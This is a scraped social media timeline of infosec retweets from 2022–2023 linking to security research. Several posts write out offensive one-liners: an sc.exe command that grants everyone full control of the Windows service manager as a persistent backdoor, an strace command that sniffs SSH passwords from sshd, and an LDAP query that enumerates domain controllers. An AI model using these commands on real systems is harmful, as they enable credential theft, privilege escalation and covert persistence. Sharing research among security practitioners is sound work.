Joined September 2009
Gleb Gritsai retweeted
Sharing highlights from incident response cases in 2022 by @AymanShaaban in brighttalk.com/webcast/18657…. You can get the slides github.com/klsecservices/Pub… and the analyst report github.com/klsecservices/Pub… #dfir #incidentresponse
Gleb Gritsai retweeted
2 Apr 2023
Gleb Gritsai retweeted
29 Mar 2023
This works on Windows 11 and both Gmail and MSFT will let it through to the inbox. Confirmed by @amitchell516 and @samkscholten. New detection/hunt rule is live for this, which looks for UNC paths inside URL file attachments (h/t @amitchell516!): github.com/sublime-security/…
Replying to @awakecoding
.url is great. The file doesn't even need to be opened, if you can get a user to download it and they go to delete it, just opening the Downloads folder sends the hash :D
Gleb Gritsai retweeted
You still need to "train" it on the specific keyboard and you need to have sort of "ideal" conditions, but yeah -- it's a fun tool :) Give it a try if you have a mechanical keyboard. There are examples you can run directly in your browser via WASM
30 Mar 2023
github.com/ggerganov/kbd-aud… This tool lets you extract text from an audio recording of keyboard strokes, right now, for free. I am not making this shit up: you can potentially steal a password from an audio recording in an office.
Gleb Gritsai retweeted
I'd like to publicly introduce BinSync, a cross-decompiler collaboration tool and suite. With BinSync, you can finally share reversing data, like Types, across all your favorite decompilers (IDA, Binja, Ghidra, angr) on the fly. github.com/binsync/binsync. See thread for demos.
Gleb Gritsai retweeted
There are two rules in life: 1) Never give out all the information.
Gleb Gritsai retweeted
Interesting paper on finding and exploiting vulns within H.264 decoders: wrv.github.io/h26forge.pdf
Gleb Gritsai retweeted
21 Mar 2023
🧵Some of my favorite LDAP queries. I let you all infer which tools to use them with. Most of these are from places around the web, nothing new. Just a list. 1. Find all DCs: (&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))
Gleb Gritsai retweeted
My latest research which completely breaks trust transitivity, enjoy :-) exploit.ph/external-trusts-a…
Gleb Gritsai retweeted
14 Mar 2023
We've just published a quick write-up on CVE-2023-23397, which allows a remote adversary to leak NetNTLMv2 hashes: mdsec.co.uk/2023/03/exploiti… by @domchell
Gleb Gritsai retweeted
26 Feb 2023
New AMSI lifetime bypass, it works by searching for the first byte of each instruction to prevent updates from affecting it. Check it out. #amsi #redteam #cybersecurity github.com/ZeroMemoryEx/Amsi…
Gleb Gritsai retweeted
23 Feb 2023
Zero Trust is a security strategy. It is not a product or a service, but an approach in designing and implementing the following set of security principles: - Verify explicitly - Use least privilege access - Assume breach Updated Information here: lnkd.in/g5UmGgEm
Gleb Gritsai retweeted
Need an almost invisible, post-exploitation, persistent, fileless, LPE backdoor? There are many, but this one looks really beautiful to me: type "sc.exe sdset scmanager D:(A;;KA;;;WD)" from an elevated command prompt.
Gleb Gritsai retweeted
21 Feb 2023
Cool blog post by @xilokar on embedded device reverse engineering, ARM TrustZone and secure boot bypass blog.xilokar.info/firmware-k… #iot #embedded #infosec #cybersecurity #hacking
Gleb Gritsai retweeted
23 Jan 2023
Check out the latest articles from the Payment Village blog paymentvillage.org/blog : 1. How I used deepfakes to bypass security verifications in a bank. My first experience with hacking ongoing due diligence checks using deepfake and ML.
Gleb Gritsai retweeted
24 Jan 2023
Very cool series by @__pberba__ about persistence in Linux environments. Persistence map: pberba.github.io/assets/post… Auditd, Sysmon, Osquery: pberba.github.io/security/20… Account Creation and Manipulation: pberba.github.io/security/20… #Linux #kernel #malware #infosec #cybersecurity
Gleb Gritsai retweeted
8 Dec 2022
Sniffing SSH passwords TL;DR
# pgrep -l sshd
6235 sshd
# strace -f -p 6235 -e trace=write -o capture
networklogician.com/2021/04/…
Gleb Gritsai retweeted
11 Oct 2022
"Hello World under the microscope" - an article we wrote together with @gynvael and @j00ru! Originally published in issue 100 (1/2022) of the Programista magazine, now available online in Polish and English. asawicki.info/articles/Hello…